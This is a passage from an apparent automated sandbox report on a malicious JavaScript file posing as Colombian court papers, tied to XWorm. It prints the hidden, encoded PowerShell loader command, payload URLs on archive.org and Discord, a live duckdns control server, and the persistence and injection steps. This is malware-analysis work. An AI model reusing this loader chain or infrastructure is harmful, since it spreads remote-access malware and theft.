anackaowakaggayqbsahqazqbyagkayqagad0aiaakag0azqbyagmaaabhag4adablahialgbeag8adwbuagwabwbhagqarabhahqayqaoacqacab5ahiabwbnag4abwbzahqaaqbjahmakqa7acqaywbhahiacablahqaygbhagcazwbpag4azwagad0aiabbafmaeqbzahqazqbtac4avablahgadaauaeuabgbjag8azabpag4azwbdadoaogbvafqarga4ac4arwblahqauwb0ahiaaqbuagcakaakaggayqbsahqazqbyagkayqapadsajabyaggayqbiagqabwbtageabgb0agkacwb0acaapqagaccapaa8aeiaqqbtaeuanga0af8auwbuaeeaugbuad4apganadsajabmahiadqbpahqazqbyaguacgbzacaapqagaccapaa8aeiaqqbtaeuanga0af8arqboaeqapga+accaowakag8adgblahiazgbsagkazwboahqacwagad0aiaakagmayqbyahaazqb0agiayqbnagcaaqbuagcalgbjag4azablahgatwbmacgajabyaggayqbiagqabwbtageabgb0agkacwb0ackaowakahaabablag8abqbhahoaaqbhacaapqagacqaywbhahiacablahqaygbhagcazwbpag4azwauaekabgbkaguaeabpagyakaakagyacgb1agkadablahiazqbyahmakqa7acqabwb2aguacgbmagwaaqbnaggadabzacaalqbnaguaiaawacaalqbhag4azaagacqacabsaguabwbtageaegbpageaiaatagcadaagacqabwb2aguacgbmagwaaqbnaggadabzadsajabvahyazqbyagyababpagcaaab0ahmaiaarad0aiaakahiaaabhagiazabvag0ayqbuahqaaqbzahqalgbmaguabgbnahqaaaa7acqaqgb1ahgadqbzacaapqagacqacabsaguabwbtageaegbpageaiaatacaajabvahyazqbyagyababpagcaaab0ahmaowakagiababpag4azwb5acaapqagacqaywbhahiacablahqaygbhagcazwbpag4azwauafmadqbiahmadabyagkabgbnacgajabvahyazqbyagyababpagcaaab0ahmalaagacqaqgb1ahgadqbzackaowakafqaaqb0ageabgbpageabgagad0aiabbafmaeqbzahqazqbtac4aqwbvag4adgblahiadabdadoaogbgahiabwbtaeiayqbzaguanga0afmadabyagkabgbnacgajabiagwaaqbuagcaeqapadsajabtaguabab0agkazqbyacaapqagafsauwb5ahmadablag0algbsaguazgbsaguaywb0agkabwbuac4aqqbzahmazqbtagiabab5af0aoga6aewabwbhagqakaakafqaaqb0ageabgbpageabgapadsajabyag8acwb0ahiayqb0ahuababhacaapqagafsazabuagwaaqbiac4asqbpac4asabvag0azqbdac4arwblahqatqblahqaaabvagqakaanafyaqqbjaccakqauaekabgb2ag8aawb
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -nop -w hidden -c "$embolic = 'jabjaggabwbuagqacgbvahmadabvag0ayqagad0aiaanacyazqa1aduamqa0aduamqa1agqaoqa3aduaoablageazgbhagiamqawadiangazagqaywa1adyaoaa1adcazgaxadcazqa4adgamgawagqaoqa0adaamqbkagyayqa2admaoqa5adqanqa2aguanaa1aguamgbjadianaawagiazaa9ag0aaaamadeazgaxadaaygawadganga9ahmaaqamadeanwazaduaywawadganga9ahgazqa/acmaeaajac4azqbsagkargbkaguaiwbyaguadgbuag8aqwavadmaoaa2aduamwayadiamwayadcaoaa5adyaoaa5adqangazadealwa1aduamgaxadcanqawaduamqa2adkanqa2adeamqa0aduamwaxac8acwajag4azqbtaggaywbhacmaiwbhac8abqbvagmalgbwahaayqbkahiabwbjahmaaqbkac4abgbkagmalwavadoacwbwacmaiwboaccaowakahaacgblahmaywbyagkaygbpag4azwagad0aiaakagmaaabvag4azabyag8acwb0ag8abqbhacaalqbyaguacabsageaywblacaajwajaccalaagaccadaanadsajabwahkacgbvagcabgbvahmadabpagmacwagad0aiaanaggadab0ahaacwa6ac8alwbhahiaywboagkadgblac4abwbyagcalwbkag8adwbuagwabwbhagqalwbuaguadwbfagkabqbhagcazqbfadiamaayaduamaa0adeamwavag4azqb3af8aaqbtageazwblac4aagbwagcajwa7acqabqblahiaywboageabgb0aguacgagad0aiaboaguadwatae8aygbqaguaywb0acaauwb5ahmadablag0algboaguadaauafcazqbiaemababpaguabgb0adsajabtaguacgbjaggayqbuahqazqbyac4asablageazablahiacwauaeeazabkacgajwbvahmazqbyac0aqqbnaguabgb0accalaanae0abwb6agkababsagealwa1ac4amaanackaowakaggayqbsahqazqbyagkayqagad0aiaakag0azqbyagmaaabhag4adablahialgbeag8adwbuagwabwbhagqarabhahqayqaoacqacab5ahiabwbnag4abwbzahqaaqbjahmakqa7acqaywbhahiacablahqaygbhagcazwbpag4azwagad0aiabbafmaeqbzahqazqbtac4avablahgadaauaeuabgbjag8azabpag4azwbdadoaogbvafqarga4ac4arwblahqauwb0ahiaaqbuagcakaakaggayqbsahqazqbyagkayqapadsajabyaggayqbiagqabwbtageabgb0agkacwb0acaapqagaccapaa8aeiaqqbtaeuanga0af8auwbuaeeaugbuad4apganadsajabmahiadqbpahqazqbyaguacgbzacaapqagaccapaa8aeiaqqbtaeuanga0af8arqboaeqapga+accaowakag8adgblahiazgbsagkazwboahqacwagad0aiaakagmayqbyahaazqb0agiayqbnagcaaqbuagcalgbjag4azablahgatwbmacgajabyaggayqbiagqabwbtageabgb0agkacwb0ackaowakahaabablag8abqbhahoaaqbhacaapqagacqaywbhahiacablahqaygbhagcazwbpag4azwauaekabgbkaguaeabpagyakaakagyacgb1agkadablahiazqbyahmakqa7acqabwb2aguacgbmagwaaqbnaggadabzacaalqbnaguaiaawacaalqbhag4azaagacqacabsaguabwbtageaegbpageaiaatagcadaagacqabwb2aguacgbmagwaaqbnaggadabzadsajabvahyazqbyagyababpagcaaab0ahmaiaarad0aiaakahiaaabhagiazabvag0ayqbuahqaaqbzahqalgbmaguabgbnahqaaaa7acqaqgb1ahgadqbzacaapqagacqacabsaguabwbtageaegbpageaiaatacaajabvahyazqbyagyababpagcaaab0ahmaowakagiababpag4azwb5acaapqagacqaywbhahiacablahqaygbhagcazwbpag4azwauafmadqbiahmadabyagkabgbnacgajabvahyazqbyagyababpagcaaab0ahmalaagacqaqgb1ahgadqbzackaowakafqaaqb0ageabgbpageabgagad0aiabbafmaeqbzahqazqbtac4aqwbvag4adgblahiadabdadoaogbgahiabwbtaeiayqbzaguanga0afmadabyagkabgbnacgajabiagwaaqbuagcaeqapadsajabtaguabab0agkazqbyacaapqagafsauwb5ahmadablag0algbsaguazgbsaguaywb0agkabwbuac4aqqbzahmazqbtagiabab5af0aoga6aewabwbhagqakaakafqaaqb0ageabgbpageabgapadsajabyag8acwb0ahiayqb0ahuababhacaapqagafsazabuagwaaqbiac4asqbpac4asabvag0azqbdac4arwblahqatqblahqaaabvagqakaanafyaqqbjaccakqauaekabgb2ag8aawbJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformationJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Lowering of HIPS / PFW / Operating System Security Settings

              barindex
              Source: Yara matchFile source: 11.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.powershell.exe.13d95f2fb50.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.powershell.exe.13d95f2fb50.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000B.00000002.2427138084.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.1288245604.0000013D95F29000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7776, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 5716, type: MEMORYSTR

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information32
              Scripting              		Valid Accounts2
              Command and Scripting Interpreter              		1
              Scheduled Task/Job              		211
              Process Injection              		1
              Disable or Modify Tools              		1
              Input Capture              		11
              Security Software Discovery              		Remote Services1
              Input Capture              		11
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              Scheduled Task/Job              		32
              Scripting              		1
              Scheduled Task/Job              		31
              Virtualization/Sandbox Evasion              		LSASS Memory1
              Process Discovery              		Remote Desktop Protocol1
              Archive Collected Data              		1
              Non-Standard Port              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              Exploitation for Client Execution              		11
              Registry Run Keys / Startup Folder              		11
              Registry Run Keys / Startup Folder              		211
              Process Injection              		Security Account Manager31
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive1
              Ingress Tool Transfer              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts2
              PowerShell              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		131
              Obfuscated Files or Information              		NTDS1
              Application Window Discovery              		Distributed Component Object ModelInput Capture2
              Non-Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Software Packing              		LSA Secrets1
              File and Directory Discovery              		SSHKeylogging113
              Application Layer Protocol              		Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading              		Cached Domain Credentials13
              System Information Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1674571 Sample: Documentos_de_la_demanda_pe... Startdate: 26/04/2025 Architecture: WINDOWS Score: 100 27 envio2333.duckdns.org 2->27 29 ia801700.us.archive.org 2->29 31 2 other IPs or domains 2->31 39 Suricata IDS alerts for network traffic 2->39 41 Malicious sample detected (through community Yara rule) 2->41 43 Multi AV Scanner detection for submitted file 2->43 47 16 other signatures 2->47 9 wscript.exe 1 1 2->9         started        signatures3 45 Uses dynamic DNS services 27->45 process4 signatures5 49 JScript performs obfuscated calls to suspicious functions 9->49 51 Suspicious powershell command line found 9->51 53 Wscript starts Powershell (via cmd or directly) 9->53 55 2 other signatures 9->55 12 powershell.exe 15 16 9->12         started        process6 dnsIp7 33 archive.org 207.241.224.2, 443, 49719 INTERNET-ARCHIVEUS United States 12->33 35 ia801700.us.archive.org 207.241.233.30, 443, 49720 INTERNET-ARCHIVEUS United States 12->35 37 cdn.discordapp.com 162.159.134.233, 443, 49723 CLOUDFLARENETUS United States 12->37 57 Creates autostart registry keys with suspicious values (likely registry only malware) 12->57 59 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 12->59 61 Writes to foreign memory regions 12->61 63 Injects a PE file into a foreign processes 12->63 16 MSBuild.exe 2 12->16         started        19 cmd.exe 1 12->19         started        21 conhost.exe 12->21         started        signatures8 process9 dnsIp10 25 envio2333.duckdns.org 146.70.50.42, 3030 TENET-1ZA United Kingdom 16->25 23 conhost.exe 19->23         started        process11

              Screenshots

              Download Video

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              Documentos_de_la_demanda_penal_en_su_contra_juzgado_03_de_bogota_6ciu345n (7).js31%VirustotalBrowse
              SAMPLE100%Joe Sandbox ML

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              No Antivirus matches

              Domains and IPs

              Download Network PCAP: filteredfull

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              envio2333.duckdns.org
              		146.70.50.42
              		truetrue
                		unknown
                archive.org
                		207.241.224.2
                		truefalse
                  		high
                  ia801700.us.archive.org
                  		207.241.233.30
                  		truefalse
                    		high
                    cdn.discordapp.com
                    		162.159.134.233
                    		truefalse
                      		high

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      https://ia801700.us.archive.org/6/items/new_image_20250413/new_image.jpgfalse
                        		high
                        https://cdn.discordapp.com/attachments/1354116596150571255/1364986987232235683/ConvertedFile.txt?ex=680c5371&is=680b01f1&hm=db042c2e54e6549936afd1049d0288e71f75865cd36201bafae8579d5154155e&false
                          		high
                          https://archive.org/download/new_image_20250413/new_image.jpgfalse
                            		high
                            NameSourceMaliciousAntivirus DetectionReputation
                            http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.1313016368.0000013DA3DA3000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.1288245604.0000013D93F55000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.1288245604.0000013D93F55000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://cdn.discordapp.compowershell.exe, 00000002.00000002.1288245604.0000013D95F00000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://contoso.com/powershell.exe, 00000002.00000002.1313016368.0000013DA3DA3000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.1313016368.0000013DA3DA3000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://contoso.com/Licensepowershell.exe, 00000002.00000002.1313016368.0000013DA3DA3000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://contoso.com/Iconpowershell.exe, 00000002.00000002.1313016368.0000013DA3DA3000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://aka.ms/pscore68powershell.exe, 00000002.00000002.1288245604.0000013D93D31000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://cdn.discordapp.compowershell.exe, 00000002.00000002.1288245604.0000013D95E27000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://t.me/xworm_v2MSBuild.exe, 0000000B.00000002.2432254374.0000000002EA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.1288245604.0000013D93D31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://cdn.discordapp.com/attachments/1354116596150571255/1364986987232235683/ConvertedFile.txt?ex=powershell.exe, 00000002.00000002.1288245604.0000013D95E27000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.1288245604.0000013D93F55000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://archive.orgpowershell.exe, 00000002.00000002.1288245604.0000013D93F55000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://ia801700.us.archive.orgpowershell.exe, 00000002.00000002.1288245604.0000013D9416B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high

                                                            World Map of Contacted IPs

                                                            • No. of IPs < 25%
                                                            • 25% < No. of IPs < 50%
                                                            • 50% < No. of IPs < 75%
                                                            • 75% < No. of IPs

                                                            Public IPs

                                                            IPDomainCountryFlagASNASN NameMalicious
                                                            207.241.233.30
                                                            		ia801700.us.archive.orgUnited States
                                                            		7941INTERNET-ARCHIVEUSfalse
                                                            207.241.224.2
                                                            		archive.orgUnited States
                                                            		7941INTERNET-ARCHIVEUSfalse
                                                            146.70.50.42
                                                            		envio2333.duckdns.orgUnited Kingdom
                                                            		2018TENET-1ZAtrue
                                                            162.159.134.233
                                                            		cdn.discordapp.comUnited States
                                                            		13335CLOUDFLARENETUSfalse

                                                            General Information

                                                            Joe Sandbox version:42.0.0 Malachite
                                                            Analysis ID:1674571
                                                            Start date and time:2025-04-26 02:52:41 +02:00
                                                            Joe Sandbox product:CloudBasic
                                                            Overall analysis duration:0h 6m 36s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:full
                                                            Cookbook file name:default.jbs
                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                            Number of analysed new started processes analysed:15
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:0
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • GSI enabled (Javascript)
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Sample name:Documentos_de_la_demanda_penal_en_su_contra_juzgado_03_de_bogota_6ciu345n (7).js
                                                            Detection:MAL
                                                            Classification:mal100.troj.spyw.expl.evad.winJS@9/3@5/4
                                                            EGA Information:Failed
                                                            HCA Information:
                                                            • Successful, ratio: 88%
                                                            • Number of executed functions: 31
                                                            • Number of non-executed functions: 3
                                                            Cookbook Comments:
                                                            • Found application associated with file extension: .js
                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                            • Excluded IPs from analysis (whitelisted): 184.29.183.29, 20.12.23.50, 20.242.39.171
                                                            • Excluded domains from analysis (whitelisted): fe3.delivery.mp.microsoft.com, fs.microsoft.com, slscr.update.microsoft.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e16604.dscf.akamaiedge.net, glb.sls.prod.dcat.dsp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                            • Execution Graph export aborted for target MSBuild.exe, PID 5716 because it is empty
                                                            • Execution Graph export aborted for target powershell.exe, PID 7776 because it is empty
                                                            • Not all processes where analyzed, report is missing behavior information
                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                            Simulations

                                                            Behavior and APIs

                                                            TimeTypeDescription
                                                            01:53:48AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Path C:\Users\Public\Downloads\fluctuous.js
                                                            01:53:56AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Path C:\Users\Public\Downloads\fluctuous.js
                                                            20:53:43API Interceptor44x Sleep call for process: powershell.exe modified
                                                            20:54:26API Interceptor2360997x Sleep call for process: MSBuild.exe modified

                                                            Joe Sandbox View / Context

                                                            IPs

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            207.241.233.30Trasferire.VBS.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                              NEW ORDER.jsGet hashmaliciousXWormBrowse
                                                                imagen Art#U00edculos DRUCK MAQUINARIA, S.L..jsGet hashmaliciousXWormBrowse
                                                                  Kir#U00e1ly Gizella T#U00e9telrendel#U00e9s.VBS.vbsGet hashmaliciousXWormBrowse
                                                                    pleaseviewstampedimageandconfirmourorder_Doc12234567754_678787899 pdf.jsGet hashmaliciousRemcosBrowse
                                                                      inquiry for chemical supply-RFQ-0982240.jsGet hashmaliciousFormBookBrowse
                                                                        inquiry for chemical supply-RFQ-0982240.jsGet hashmaliciousFormBookBrowse
                                                                          Maker Srl - Nuovo ordine.jsGet hashmaliciousXWormBrowse
                                                                            https://www.mediafire.com/file_premium/862bjkucj0uc79f/69149366_pdf.lzh/fileGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              Documento.jsGet hashmaliciousAsyncRAT, PureLog StealerBrowse
                                                                                207.241.224.2http://web.archive.org/web/20220923183800/https://londonsuccessuniversity.com/favicon.icoGet hashmaliciousUnknownBrowse
                                                                                • archive.org/includes/build/js/archive.min.js?v=32fa782e
                                                                                162.159.134.233Cheat.Lab.2.7.1.msiGet hashmaliciousRedLineBrowse
                                                                                • cdn.discordapp.com/attachments/1166694372084027482/1169541101917577226/2.txt
                                                                                http://162.159.134.233:443Get hashmaliciousUnknownBrowse
                                                                                • 162.159.134.233:443/
                                                                                PO - Drawings And Specifications Sheet_pdf.scr.exeGet hashmaliciousAveMariaBrowse
                                                                                • cdn.discordapp.com/attachments/472051232014598144/935778066171580456/Sjddks44.jpg

                                                                                Domains

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                cdn.discordapp.comDiscordTokenLogin.exeGet hashmaliciousTroubleGrabberBrowse
                                                                                • 162.159.135.233
                                                                                DiscordTokenLogin.exeGet hashmaliciousTroubleGrabberBrowse
                                                                                • 162.159.130.233
                                                                                NatchoPremium.exeGet hashmaliciousUnknownBrowse
                                                                                • 162.159.134.233
                                                                                NatchoPremium.exeGet hashmaliciousUnknownBrowse
                                                                                • 162.159.134.233
                                                                                NATCHO CHEAT.exeGet hashmaliciousUnknownBrowse
                                                                                • 162.159.135.233
                                                                                NATCHO CHEAT.exeGet hashmaliciousUnknownBrowse
                                                                                • 162.159.133.233
                                                                                hzluQdk9nk.exeGet hashmaliciousUnknownBrowse
                                                                                • 162.159.135.233
                                                                                hzluQdk9nk.exeGet hashmaliciousUnknownBrowse
                                                                                • 162.159.135.233
                                                                                Order No. 20250407-70611.vbsGet hashmaliciousUnknownBrowse
                                                                                • 162.159.129.233
                                                                                Order No. 20250407-70611.vbsGet hashmaliciousUnknownBrowse
                                                                                • 162.159.133.233
                                                                                archive.orgTrasferire.VBS.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                • 207.241.233.30
                                                                                NEW ORDER.jsGet hashmaliciousXWormBrowse
                                                                                • 207.241.233.30
                                                                                Update.vbsGet hashmaliciousUnknownBrowse
                                                                                • 207.241.224.2
                                                                                imagen Art#U00edculos DRUCK MAQUINARIA, S.L..jsGet hashmaliciousXWormBrowse
                                                                                • 207.241.233.30
                                                                                Art#U00edculos enumerados.jsGet hashmaliciousUnknownBrowse
                                                                                • 207.241.227.90
                                                                                Kir#U00e1ly Gizella T#U00e9telrendel#U00e9s.VBS.vbsGet hashmaliciousXWormBrowse
                                                                                • 207.241.233.30
                                                                                pleaseviewstampedimageandconfirmourorder_Doc12234567754_678787899 pdf.jsGet hashmaliciousRemcosBrowse
                                                                                • 207.241.233.30
                                                                                inquiry for chemical supply-RFQ-0982240.jsGet hashmaliciousFormBookBrowse
                                                                                • 207.241.233.30
                                                                                inquiry for chemical supply-RFQ-0982240.jsGet hashmaliciousFormBookBrowse
                                                                                • 207.241.233.30
                                                                                LEGAL-INVOICES.jsGet hashmaliciousFormBookBrowse
                                                                                • 207.241.227.90
                                                                                ia801700.us.archive.orgTrasferire.VBS.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                • 207.241.233.30
                                                                                NEW ORDER.jsGet hashmaliciousXWormBrowse
                                                                                • 207.241.233.30
                                                                                imagen Art#U00edculos DRUCK MAQUINARIA, S.L..jsGet hashmaliciousXWormBrowse
                                                                                • 207.241.233.30
                                                                                Kir#U00e1ly Gizella T#U00e9telrendel#U00e9s.VBS.vbsGet hashmaliciousXWormBrowse
                                                                                • 207.241.233.30
                                                                                pleaseviewstampedimageandconfirmourorder_Doc12234567754_678787899 pdf.jsGet hashmaliciousRemcosBrowse
                                                                                • 207.241.233.30
                                                                                inquiry for chemical supply-RFQ-0982240.jsGet hashmaliciousFormBookBrowse
                                                                                • 207.241.233.30
                                                                                inquiry for chemical supply-RFQ-0982240.jsGet hashmaliciousFormBookBrowse
                                                                                • 207.241.233.30
                                                                                Maker Srl - Nuovo ordine.jsGet hashmaliciousXWormBrowse
                                                                                • 207.241.233.30
                                                                                https://www.mediafire.com/file_premium/862bjkucj0uc79f/69149366_pdf.lzh/fileGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                • 207.241.233.30
                                                                                Documento.jsGet hashmaliciousAsyncRAT, PureLog StealerBrowse
                                                                                • 207.241.233.30

                                                                                ASNs

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                INTERNET-ARCHIVEUSTrasferire.VBS.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                • 207.241.224.2
                                                                                NEW ORDER.jsGet hashmaliciousXWormBrowse
                                                                                • 207.241.224.2
                                                                                Update.vbsGet hashmaliciousUnknownBrowse
                                                                                • 207.241.224.2
                                                                                imagen Art#U00edculos DRUCK MAQUINARIA, S.L..jsGet hashmaliciousXWormBrowse
                                                                                • 207.241.224.2
                                                                                Art#U00edculos enumerados.jsGet hashmaliciousUnknownBrowse
                                                                                • 207.241.224.2
                                                                                Kir#U00e1ly Gizella T#U00e9telrendel#U00e9s.VBS.vbsGet hashmaliciousXWormBrowse
                                                                                • 207.241.224.2
                                                                                pleaseviewstampedimageandconfirmourorder_Doc12234567754_678787899 pdf.jsGet hashmaliciousRemcosBrowse
                                                                                • 207.241.224.2
                                                                                inquiry for chemical supply-RFQ-0982240.jsGet hashmaliciousFormBookBrowse
                                                                                • 207.241.224.2
                                                                                inquiry for chemical supply-RFQ-0982240.jsGet hashmaliciousFormBookBrowse
                                                                                • 207.241.224.2
                                                                                LEGAL-INVOICES.jsGet hashmaliciousFormBookBrowse
                                                                                • 207.241.227.90
                                                                                INTERNET-ARCHIVEUSTrasferire.VBS.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                • 207.241.224.2
                                                                                NEW ORDER.jsGet hashmaliciousXWormBrowse
                                                                                • 207.241.224.2
                                                                                Update.vbsGet hashmaliciousUnknownBrowse
                                                                                • 207.241.224.2
                                                                                imagen Art#U00edculos DRUCK MAQUINARIA, S.L..jsGet hashmaliciousXWormBrowse
                                                                                • 207.241.224.2
                                                                                Art#U00edculos enumerados.jsGet hashmaliciousUnknownBrowse
                                                                                • 207.241.224.2
                                                                                Kir#U00e1ly Gizella T#U00e9telrendel#U00e9s.VBS.vbsGet hashmaliciousXWormBrowse
                                                                                • 207.241.224.2
                                                                                pleaseviewstampedimageandconfirmourorder_Doc12234567754_678787899 pdf.jsGet hashmaliciousRemcosBrowse
                                                                                • 207.241.224.2
                                                                                inquiry for chemical supply-RFQ-0982240.jsGet hashmaliciousFormBookBrowse
                                                                                • 207.241.224.2
                                                                                inquiry for chemical supply-RFQ-0982240.jsGet hashmaliciousFormBookBrowse
                                                                                • 207.241.224.2
                                                                                LEGAL-INVOICES.jsGet hashmaliciousFormBookBrowse
                                                                                • 207.241.227.90
                                                                                CLOUDFLARENETUSLuma_Crypt_Packlab.exeGet hashmaliciousLummaC StealerBrowse
                                                                                • 104.21.85.126
